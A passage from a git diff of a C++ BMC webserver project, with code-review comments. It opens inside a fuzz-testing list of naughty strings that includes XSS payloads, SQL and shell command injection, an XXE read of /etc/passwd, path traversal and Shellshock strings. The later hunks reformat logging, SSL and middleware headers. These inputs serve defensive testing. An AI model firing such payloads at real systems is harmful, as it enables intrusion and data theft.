href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Ajavascript:javascript:alert(1)\" 
id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", + "`\"'><img 
src=xxx:x \\x20onerror=javascript:alert(1)>", "\"`'><script>\\x3Bjavascript:alert(1)</script>", "\"`'><script>\\x0Djavascript:alert(1)</script>", + "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", + "\"`'><script>\\x09javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", + "\"`'><script>\\x00javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", "\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", + "\"`'><script>\\x0Cjavascript:alert(1)</script>", "\"`'><script>\\x2Bjavascript:alert(1)</script>", + "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", "\"`'><script>-javascript:alert(1)</script>", + "\"`'><script>\\x0Ajavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", + "\"`'><script>\\x7Ejavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", + "\"`'><script>\\xC2\\x85javascript:alert(1)</script>", "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", + "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", + "\"`'><script>\\x21javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", 
"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", + "\"`'><script>\\x0Bjavascript:alert(1)</script>", "\"`'><script>\\x20javascript:alert(1)</script>", "\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", + "<img \\x00src=x onerror=\"alert(1)\">", "<img \\x47src=x onerror=\"javascript:alert(1)\">", "<img \\x11src=x onerror=\"javascript:alert(1)\">", + "<img \\x12src=x onerror=\"javascript:alert(1)\">", "<img\\x47src=x onerror=\"javascript:alert(1)\">", "<img\\x10src=x onerror=\"javascript:alert(1)\">", + "<img\\x13src=x onerror=\"javascript:alert(1)\">", "<img\\x32src=x onerror=\"javascript:alert(1)\">", "<img\\x47src=x onerror=\"javascript:alert(1)\">", + "<img\\x11src=x onerror=\"javascript:alert(1)\">", "<img \\x47src=x onerror=\"javascript:alert(1)\">", "<img \\x34src=x onerror=\"javascript:alert(1)\">", + "<img \\x39src=x onerror=\"javascript:alert(1)\">", "<img \\x00src=x onerror=\"javascript:alert(1)\">", "<img src\\x09=x onerror=\"javascript:alert(1)\">", + "<img src\\x10=x onerror=\"javascript:alert(1)\">", "<img src\\x13=x onerror=\"javascript:alert(1)\">", "<img src\\x32=x onerror=\"javascript:alert(1)\">", + "<img src\\x12=x onerror=\"javascript:alert(1)\">", "<img src\\x11=x onerror=\"javascript:alert(1)\">", "<img src\\x00=x onerror=\"javascript:alert(1)\">", + "<img src\\x47=x onerror=\"javascript:alert(1)\">", "<img src=x\\x09onerror=\"javascript:alert(1)\">", "<img src=x\\x10onerror=\"javascript:alert(1)\">", + "<img src=x\\x11onerror=\"javascript:alert(1)\">", "<img src=x\\x12onerror=\"javascript:alert(1)\">", "<img src=x\\x13onerror=\"javascript:alert(1)\">", + "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", "<img src=x onerror=\\x09\"javascript:alert(1)\">", "<img src=x onerror=\\x10\"javascript:alert(1)\">", + "<img src=x onerror=\\x11\"javascript:alert(1)\">", "<img src=x onerror=\\x12\"javascript:alert(1)\">", "<img src=x onerror=\\x32\"javascript:alert(1)\">", + "<img src=x onerror=\\x00\"javascript:alert(1)\">", "<a 
href=javascript:javascript:alert(1)>XXX</a>", + "<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", "<img src onerror /\" '\"= alt=javascript:alert(1)//\">", + "<title onpropertychange=javascript:alert(1)></title><title title=>", + "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", "<!--[if]><script>javascript:alert(1)</script -->", + "<!--[if<img src=x onerror=javascript:alert(1)//]> -->", "<script src=\"/\%(jscript)s\"></script>", "<script src=\"\\%(jscript)s\"></script>", + "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", "<IMG SRC=# onmouseover=\"alert('xxs')\">", + "<IMG SRC= onmouseover=\"alert('xxs')\">", "<IMG onmouseover=\"alert('xxs')\">", + "<IMG SRC=javascript:alert('XSS')>", + "<IMG " + "SRC=javascript:alert&#" + "0000040'XSS')>", + "<IMG SRC=javascript:alert('XSS')>", + "<IMG SRC=\"jav ascript:alert('XSS');\">", "<IMG SRC=\"jav	ascript:alert('XSS');\">", "<IMG SRC=\"jav
ascript:alert('XSS');\">", + "<IMG SRC=\"jav
ascript:alert('XSS');\">", "perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out", + "<IMG SRC=\"  javascript:alert('XSS');\">", "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", + "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", "<SCRIPT SRC=//ha.ckers.org/.j>", "<IMG SRC=\"javascript:alert('XSS')\"", + "<iframe src=http://ha.ckers.org/scriptlet.html <", "\\\";alert('XSS');//", "<u oncopy=alert()> Copy me</u>", "<i onwheel=alert(1)> Scroll over me </i>", + "<plaintext>", "http://a/%%30%30", "</textarea><script>alert(123)</script>", + + // SQL Injection + // + // Strings which can cause a SQL injection if inputs are not sanitized + + "1;DROP TABLE users", "1'; DROP TABLE users-- 1", "' OR 1=1 -- 1", "' OR '1'='1", " ", "%", "_", + + // Server Code Injection + // + // Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) + + "-", "--", "--version", "--help", "$USER", "/dev/null; touch /tmp/blns.fail ; echo", "`touch /tmp/blns.fail`", "$(touch /tmp/blns.fail)", + "@{[system \"touch /tmp/blns.fail\"]}", + + // Command Injection (Ruby) + // + // Strings which can call system commands within Ruby/Rails applications + + "eval(\"puts 'hello world'\")", "System(\"ls -al /\")", "`ls -al /`", "Kernel.exec(\"ls -al /\")", "Kernel.exit(1)", "%x('ls -al /')", + + // XXE Injection (XML) + // + // String which can reveal system files when parsed by a badly configured XML parser + + "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", + + // Unwanted Interpolation + // + // Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or + //shell eval. 
Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. + + "$HOME", "$ENV{'HOME'}", "%d", "%s", "{0}", "%*.*s", "File:///", + + // File Inclusion + // + // Strings which can cause user to pull in files that should not be a part of a web server + + "../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../etc/hosts", + + // Known CVEs and Vulnerabilities + // + // Strings that test for known vulnerabilities + + "() { 0; }; touch /tmp/blns.shellshock1.fail;", "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", "<<< %s(un='%s') = %u", "+++ATH0", + + // MSDOS/Windows Special Filenames + // + // Strings which are reserved characters in MSDOS/Windows + + "CON", "PRN", "AUX", "CLOCK$", "NUL", "A:", "ZZ:", "COM1", "LPT1", "LPT2", "LPT3", "COM2", "COM3", "COM4", + + // IRC specific strings + // + // Strings that may occur on IRC clients that make security products freak out + + "DCC SEND STARTKEYLOGGER 0 0 0", + + // Scunthorpe Problem + // + // Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) + + "Scunthorpe General Hospital", "Penistone Community Church", "Lightwater Country Park", "Jimmy Clitheroe", "Horniman Museum", "shitake mushrooms", + "RomansInSussex.co.uk", "http://www.cum.qc.ca/", "Craig Cockburn, Software Specialist", "Linda Callahan", "Dr. Herman I. Libshitz", "magna cum laude", + "Super Bowl XXX", "medieval erection of parapets", "evaluate", "mocha", "expression", "Arsenal canal", "classic", "Tyson Gay", "Dick Van Dyke", "basement", + + // Human injection + // + // Strings which may cause human to reinterpret worldview + + "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your " + "dream, but we hope it works. 
Please wake up, we miss you.", + + // Terminal escape codes + // + // Strings which punish the fools who use cat/type on this file + + "Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue", "But now...[20Cfor my greatest trick...[8m", + "The quick brown fox... [Beeeep]", + + // iOS Vulnerabilities + // + // Strings which crashed iMessage in various versions of iOS + + "Powerトマトマᄉムᄄマトマトᄉムᄄマᄆᄆヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ " + "¢ᆬᆪ¥ニラ", + "゚マᄈ0゚フネᄌマ"};
\ No newline at end of file diff --git a/include/color_cout_g3_sink.hpp b/include/color_cout_g3_sink.hpp index cd98fac05d..a92bf9432e 100644 --- a/include/color_cout_g3_sink.hpp +++ b/include/color_cout_g3_sink.hpp @@ -1,26 +1,29 @@ #pragma once -namespace crow -{ - struct ColorCoutSink { - +namespace crow { +struct ColorCoutSink { // Linux xterm color // http://stackoverflow.com/questions/2616906/how-do-i-output-coloured-text-to-a-linux-terminal - enum FG_Color {YELLOW = 33, RED = 31, GREEN=32, WHITE = 97}; - - FG_Color GetColor(const LEVELS level) const { - if (level.value == WARNING.value) { return YELLOW; } - if (level.value == DEBUG.value) { return GREEN; } - if (g3::internal::wasFatal(level)) { return RED; } + enum FG_Color { YELLOW = 33, RED = 31, GREEN = 32, WHITE = 97 }; - return WHITE; + FG_Color GetColor(const LEVELS level) const { + if (level.value == WARNING.value) { + return YELLOW; } - - void ReceiveLogMessage(g3::LogMessageMover logEntry) { - auto level = logEntry.get()._level; - auto color = GetColor(level); - - std::cout << "\033[" << color << "m" - << logEntry.get().toString() << "\033[m"; + if (level.value == DEBUG.value) { + return GREEN; + } + if (g3::internal::wasFatal(level)) { + return RED; } - }; + + return WHITE; + } + + void ReceiveLogMessage(g3::LogMessageMover logEntry) { + auto level = logEntry.get()._level; + auto color = GetColor(level); + + std::cout << "\033[" << color << "m" << logEntry.get().toString() << "\033[m"; + } +}; }
\ No newline at end of file diff --git a/include/crow_g3_logger.hpp b/include/crow_g3_logger.hpp index e39269a579..a7e7d9ffbf 100644 --- a/include/crow_g3_logger.hpp +++ b/include/crow_g3_logger.hpp 
@@ -5,88 +5,70 @@
 // but deletes the ILogHandler interface, as usage of that would be counter to the g3
 // handler management, and would cause performance issues.
-
-#include <string>
 #include <cstdio>
 #include <cstdlib>
 #include <ctime>
 #include <iostream>
 #include <sstream>
+#include <string>
 #include <g3log/g3log.hpp>
 #include <g3log/logworker.hpp>
-namespace crow
-{
- enum class LogLevel
- {
+namespace crow {
+enum class LogLevel {
 #ifndef ERROR
- DEBUG = 0,
- INFO,
- WARNING,
- ERROR,
- CRITICAL,
+ DEBUG = 0,
+ INFO,
+ WARNING,
+ ERROR,
+ CRITICAL,
 #endif
- Debug = 0,
- Info,
- Warning,
- Error,
- Critical,
- };
-
- class logger {
-
- public:
-
-
- logger(std::string prefix, LogLevel level) : level_(level) {
- // no op, let g3 handle th log levels
-
- }
-
- //
- template <typename T>
- logger& operator<<(T const &value) {
-
- #ifdef CROW_ENABLE_LOGGING
- if(level_ >= get_current_log_level()) {
- stringstream_ << value;
- }
- #endif
- return *this;
- }
+ Debug = 0,
+ Info,
+ Warning,
+ Error,
+ Critical,
+};
+
+class logger {
+ public:
+ logger(std::string prefix, LogLevel level) : level_(level) {
+ // no op, let g3 handle th log levels
+ }
+
+ //
+ template <typename T>
+ logger& operator<<(T const& value) {
+#ifdef CROW_ENABLE_LOGGING
+ if (level_ >= get_current_log_level()) {
+ stringstream_ << value;
+ }
+#endif
+ return *this;
+ }
- //
- static void setLogLevel(LogLevel level) {
- get_log_level_ref() = level;
- }
+ //
+ static void setLogLevel(LogLevel level) { get_log_level_ref() = level; }
- static LogLevel get_current_log_level() {
- return get_log_level_ref();
- }
+ static LogLevel get_current_log_level() { return get_log_level_ref(); }
- private:
- //
- static LogLevel& get_log_level_ref()
- {
- static LogLevel current_level = (LogLevel)CROW_LOG_LEVEL;
- return current_level;
- }
+ private:
+ //
+ static LogLevel& get_log_level_ref() {
+ static LogLevel current_level = (LogLevel)CROW_LOG_LEVEL;
+ return current_level;
+ }
- //
- std::ostringstream stringstream_;
- LogLevel level_;
- };
+ //
+ std::ostringstream stringstream_;
+ LogLevel level_;
+};
 }
-#define CROW_LOG_CRITICAL \
- LOG(FATAL)
-#define CROW_LOG_ERROR \
- LOG(WARNING)
-#define CROW_LOG_WARNING \
- LOG(WARNING)
-#define CROW_LOG_INFO \
- LOG(INFO)
-#define CROW_LOG_DEBUG \
- LOG(DEBUG)
+#define CROW_LOG_CRITICAL LOG(FATAL)
+#define CROW_LOG_ERROR LOG(WARNING)
+#define CROW_LOG_WARNING LOG(WARNING)
+#define CROW_LOG_INFO LOG(INFO)
+#define CROW_LOG_DEBUG LOG(DEBUG)
diff --git a/include/ssl_key_handler.hpp b/include/ssl_key_handler.hpp
index a658d9cb0e..69eae13dbb 100644
--- a/include/ssl_key_handler.hpp
+++ b/include/ssl_key_handler.hpp
@@ -11,172 +11,162 @@
 #include <openssl/rsa.h>
 #include <openssl/ssl.h>
-namespace ensuressl
-{
+namespace ensuressl {
 static void init_openssl(void);
 static void cleanup_openssl(void);
 static EVP_PKEY *create_rsa_key(void);
 static void handle_openssl_error(void);
-inline bool verify_openssl_key_cert(const std::string &filepath)
-{
- bool private_key_valid = false;
- bool cert_valid = false;
- FILE *file = fopen(filepath.c_str(), "r");
- if (file != NULL){
- EVP_PKEY *pkey = PEM_read_PrivateKey(file, NULL, NULL, NULL);
- int rc;
- if (pkey) {
- int type = EVP_PKEY_type(pkey->type);
- switch (type) {
- case EVP_PKEY_RSA:
- case EVP_PKEY_RSA2: {
- RSA *rsa = EVP_PKEY_get1_RSA(pkey);
- rc = RSA_check_key(rsa);
- if (rc == 1) {
- private_key_valid = true;
- }
-
- //RSA_free(rsa);
-
- break;
- }
- default:
- break;
- }
-
- if (private_key_valid) {
- X509 *x509 = PEM_read_X509(file, NULL, NULL, NULL);
- unsigned long err = ERR_get_error();
-
- rc = X509_verify(x509, pkey);
- err = ERR_get_error();
- if (err == 0 && rc == 1) {
- cert_valid = true;
- }
- }
-
- EVP_PKEY_free(pkey);
+inline bool verify_openssl_key_cert(const std::string &filepath) {
+ bool private_key_valid = false;
+ bool cert_valid = false;
+ FILE *file = fopen(filepath.c_str(), "r");
+ if (file != NULL) {
+ EVP_PKEY *pkey = PEM_read_PrivateKey(file, NULL, NULL, NULL);
+ int rc;
+ if (pkey) {
+ int type = EVP_PKEY_type(pkey->type);
+ switch (type) {
+ case EVP_PKEY_RSA:
+ case EVP_PKEY_RSA2: {
+ RSA *rsa = EVP_PKEY_get1_RSA(pkey);
+ rc = RSA_check_key(rsa);
+ if (rc == 1) {
+ private_key_valid = true;
+ }
+
+ // RSA_free(rsa);
+
+ break;
 }
- fclose(file);
+ default:
+ break;
+ }
+
+ if (private_key_valid) {
+ X509 *x509 = PEM_read_X509(file, NULL, NULL, NULL);
+ unsigned long err = ERR_get_error();
+
+ rc = X509_verify(x509, pkey);
+ err = ERR_get_error();
+ if (err == 0 && rc == 1) {
+ cert_valid = true;
+ }
+ }
+
+ EVP_PKEY_free(pkey);
 }
- return cert_valid;
+ fclose(file);
+ }
+ return cert_valid;
 }
-inline void generate_ssl_certificate(const std::string &filepath)
-{
- EVP_PKEY *pPrivKey = NULL;
- FILE *pFile = NULL;
- init_openssl();
-
- pPrivKey = create_rsa_key();
-
- // Use this code to directly generate a certificate
- X509 *x509;
- x509 = X509_new();
- if (x509) {
- // TODO get actually random int
- ASN1_INTEGER_set(X509_get_serialNumber(x509), 1584);
-
- // not before this moment
- X509_gmtime_adj(X509_get_notBefore(x509), 0);
- // Cert is valid for 10 years
- X509_gmtime_adj(X509_get_notAfter(x509), 60L * 60L * 24L * 365L * 10L);
-
- // set the public key to the key we just generated
- X509_set_pubkey(x509, pPrivKey);
-
- // Get the subject name
- X509_NAME *name;
- name = X509_get_subject_name(x509);
-
- X509_NAME_add_entry_by_txt(name, "C", MBSTRING_ASC, (unsigned char *)"US", -1,
- -1, 0);
- X509_NAME_add_entry_by_txt(name, "O", MBSTRING_ASC,
- (unsigned char *)"Intel BMC", -1, -1, 0);
- X509_NAME_add_entry_by_txt(name, "CN", MBSTRING_ASC,
- (unsigned char *)"testhost", -1, -1, 0);
- // set the CSR options
- X509_set_issuer_name(x509, name);
-
- // Sign the certificate with our private key
- X509_sign(x509, pPrivKey, EVP_sha256());
-
- pFile = fopen(filepath.c_str(), "wt");
-
- if (pFile) {
- PEM_write_PrivateKey(pFile, pPrivKey, NULL, NULL, 0, 0, NULL);
- PEM_write_X509(pFile, x509);
- fclose(pFile);
- pFile = NULL;
- }
+inline void generate_ssl_certificate(const std::string &filepath) {
+ EVP_PKEY *pPrivKey = NULL;
+ FILE *pFile = NULL;
+ init_openssl();
- X509_free(x509);
- }
+ pPrivKey = create_rsa_key();
+
+ // Use this code to directly generate a certificate
+ X509 *x509;
+ x509 = X509_new();
+ if (x509) {
+ // TODO get actually random int
+ ASN1_INTEGER_set(X509_get_serialNumber(x509), 1584);
+
+ // not before this moment
+ X509_gmtime_adj(X509_get_notBefore(x509), 0);
+ // Cert is valid for 10 years
+ X509_gmtime_adj(X509_get_notAfter(x509), 60L * 60L * 24L * 365L * 10L);
+
+ // set the public key to the key we just generated
+ X509_set_pubkey(x509, pPrivKey);
+
+ // Get the subject name
+ X509_NAME *name;
+ name = X509_get_subject_name(x509);
+
+ X509_NAME_add_entry_by_txt(name, "C", MBSTRING_ASC, (unsigned char *)"US", -1, -1, 0);
+ X509_NAME_add_entry_by_txt(name, "O", MBSTRING_ASC, (unsigned char *)"Intel BMC", -1, -1, 0);
+ X509_NAME_add_entry_by_txt(name, "CN", MBSTRING_ASC, (unsigned char *)"testhost", -1, -1, 0);
+ // set the CSR options
+ X509_set_issuer_name(x509, name);
+
+ // Sign the certificate with our private key
+ X509_sign(x509, pPrivKey, EVP_sha256());
- if (pPrivKey) {
- EVP_PKEY_free(pPrivKey);
- pPrivKey = NULL;
+ pFile = fopen(filepath.c_str(), "wt");
+
+ if (pFile) {
+ PEM_write_PrivateKey(pFile, pPrivKey, NULL, NULL, 0, 0, NULL);
+ PEM_write_X509(pFile, x509);
+ fclose(pFile);
+ pFile = NULL;
 }
- //cleanup_openssl();
+ X509_free(x509);
+ }
+
+ if (pPrivKey) {
+ EVP_PKEY_free(pPrivKey);
+ pPrivKey = NULL;
+ }
+
+ // cleanup_openssl();
 }
-EVP_PKEY *create_rsa_key(void)
-{
- RSA *pRSA = NULL;
- EVP_PKEY *pKey = NULL;
- pRSA = RSA_generate_key(2048, RSA_3, NULL, NULL);
- pKey = EVP_PKEY_new();
- if (pRSA && pKey && EVP_PKEY_assign_RSA(pKey, pRSA)) {
- /* pKey owns pRSA from now */
- if (RSA_check_key(pRSA) <= 0) {
- fprintf(stderr, "RSA_check_key failed.\n");
- handle_openssl_error();
- EVP_PKEY_free(pKey);
- pKey = NULL;
- }
- } else {
- handle_openssl_error();
- if (pRSA) {
- RSA_free(pRSA);
- pRSA = NULL;
- }
- if (pKey) {
- EVP_PKEY_free(pKey);
- pKey = NULL;
- }
+EVP_PKEY *create_rsa_key(void) {
+ RSA *pRSA = NULL;
+ EVP_PKEY *pKey = NULL;
+ pRSA = RSA_generate_key(2048, RSA_3, NULL, NULL);
+ pKey = EVP_PKEY_new();
+ if (pRSA && pKey && EVP_PKEY_assign_RSA(pKey, pRSA)) {
+ /* pKey owns pRSA from now */
+ if (RSA_check_key(pRSA) <= 0) {
+ fprintf(stderr, "RSA_check_key failed.\n");
+ handle_openssl_error();
+ EVP_PKEY_free(pKey);
+ pKey = NULL;
+ }
+ } else {
+ handle_openssl_error();
+ if (pRSA) {
+ RSA_free(pRSA);
+ pRSA = NULL;
 }
- return pKey;
+ if (pKey) {
+ EVP_PKEY_free(pKey);
+ pKey = NULL;
+ }
+ }
+ return pKey;
 }
-void init_openssl(void)
-{
- if (SSL_library_init()) {
- SSL_load_error_strings();
- OpenSSL_add_all_algorithms();
- RAND_load_file("/dev/urandom", 1024);
- } else
- exit(EXIT_FAILURE);
+void init_openssl(void) {
+ if (SSL_library_init()) {
+ SSL_load_error_strings();
+ OpenSSL_add_all_algorithms();
+ RAND_load_file("/dev/urandom", 1024);
+ } else
+ exit(EXIT_FAILURE);
 }
-void cleanup_openssl(void)
-{
- CRYPTO_cleanup_all_ex_data();
- ERR_free_strings();
- ERR_remove_thread_state(0);
- EVP_cleanup();
+void cleanup_openssl(void) {
+ CRYPTO_cleanup_all_ex_data();
+ ERR_free_strings();
+ ERR_remove_thread_state(0);
+ EVP_cleanup();
 }
 void handle_openssl_error(void) { ERR_print_errors_fp(stderr); }
-inline void ensure_openssl_key_present_and_valid(const std::string &filepath)
-{
- bool pem_file_valid = false;
+inline void ensure_openssl_key_present_and_valid(const std::string &filepath) {
+ bool pem_file_valid = false;
- pem_file_valid = verify_openssl_key_cert(filepath);
+ pem_file_valid = verify_openssl_key_cert(filepath);
- if (!pem_file_valid) {
- generate_ssl_certificate(filepath);
- }
+ if (!pem_file_valid) {
+ generate_ssl_certificate(filepath);
+ }
 }
 }
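Review bot: In verify_openssl_key_cert the result of `PEM_read_X509(file, NULL, NULL, NULL)` is handed straight to `X509_verify(x509, pkey)` with no NULL check, so a PEM file that holds only a private key (or a malformed certificate block) dereferences NULL instead of returning false, and the certificate object is never released. The `RSA *rsa` obtained from `EVP_PKEY_get1_RSA` holds a reference that the commented-out `// RSA_free(rsa);` never drops, so each validation leaks it; guarding with `if (x509 != NULL) { rc = X509_verify(x509, pkey); X509_free(x509); }` and restoring `RSA_free(rsa);` after `RSA_check_key` addresses both. In generate_ssl_certificate the serial remains the constant 1584 (the TODO already acknowledges it) and create_rsa_key selects `RSA_3` as the public exponent, where `RSA_F4` (65537) and a randomly generated serial are the conventional choices before this self-signed certificate is used anywhere beyond testing. These issues are pre-existing in the reformatted functions, all of which are complete within this hunk.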
\ No newline at end of file
diff --git a/include/token_authorization_middleware.hpp b/include/token_authorization_middleware.hpp
index 801c75f91b..7e8e5031ac 100644
--- a/include/token_authorization_middleware.hpp
+++ b/include/token_authorization_middleware.hpp
@@ -3,21 +3,19 @@
 #include <crow/http_request.h>
 #include <crow/http_response.h>
-namespace crow
-{
- struct TokenAuthorizationMiddleware {
+namespace crow {
+struct TokenAuthorizationMiddleware {
+ struct context {
+ std::unordered_map<std::string, std::string> cookie_sessions;
+ std::unordered_map<std::string, std::string> cookies_to_push_to_client;
- struct context {
- std::unordered_map<std::string, std::string> cookie_sessions;
- std::unordered_map<std::string, std::string> cookies_to_push_to_client;
+ std::string get_cookie(const std::string& key);
- std::string get_cookie(const std::string& key);
+ void set_cookie(const std::string& key, const std::string& value);
+ };
- void set_cookie(const std::string& key, const std::string& value);
- };
+ void before_handle(crow::request& req, response& res, context& ctx);
- void before_handle(crow::request& req, response& res, context& ctx);
-
- void after_handle(request& req, response& res, context& ctx);
- };
+ void after_handle(request& req, response& res, context& ctx);
+};
 }
\ No newline at end of file
diff --git a/include/webassets.hpp b/include/webassets.hpp
index 68a6c4a36b..b2bda68869 100644
--- a/include/webassets.hpp
+++ b/include/webassets.hpp
@@ -2,18 +2,16 @@
 #include <string>
+#include <crow/app.h>
 #include <crow/http_request.h>
 #include <crow/http_response.h>
-#include <crow/app.h>
-//TODO this is wrong. file handler shouldn't care about middlewares
-#include "token_authorization_middleware.hpp"
+// TODO this is wrong. file handler shouldn't care about middlewares
 #include <crow/routing.h>
+#include "token_authorization_middleware.hpp"
-namespace crow
-{
-namespace webassets
-{
- void request_routes(crow::App<crow::TokenAuthorizationMiddleware>& app);
+namespace crow {
+namespace webassets {
+void request_routes(crow::App<crow::TokenAuthorizationMiddleware>& app);
 }
 }
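Review bot: The `// TODO this is wrong. file handler shouldn't care about middlewares` comment now sits directly above `#include <crow/routing.h>`, while the include it describes, `#include "token_authorization_middleware.hpp"`, was sorted below it by the include reordering, so the note no longer points at what it annotates. Moving the comment down so it stays immediately above the token_authorization_middleware.hpp include keeps the two together through future re-sorts. The same reorder in src/webserver_main.cpp has no such comment attached and needs nothing.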
\ No newline at end of file
diff --git a/src/base64.cpp b/src/base64.cpp
index 259288757b..001a467899 100644
--- a/src/base64.cpp
+++ b/src/base64.cpp
@@ -1,81 +1,67 @@
 #include <base64.hpp>
 #include <cassert>
-namespace base64
-{
-bool base64_encode(const gsl::cstring_span<> &input, std::string &output)
-{
- static const char encoding_data[] =
- "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
-
- unsigned int input_length = input.size();
-
- // allocate space for output string
- output.clear();
- output.reserve(((input_length + 2) / 3) * 4);
-
- // for each 3-bytes sequence from the input, extract 4 6-bits sequences and
- // encode using
- // encoding_data lookup table.
- // if input do not contains enough chars to complete 3-byte sequence,use pad
- // char '='
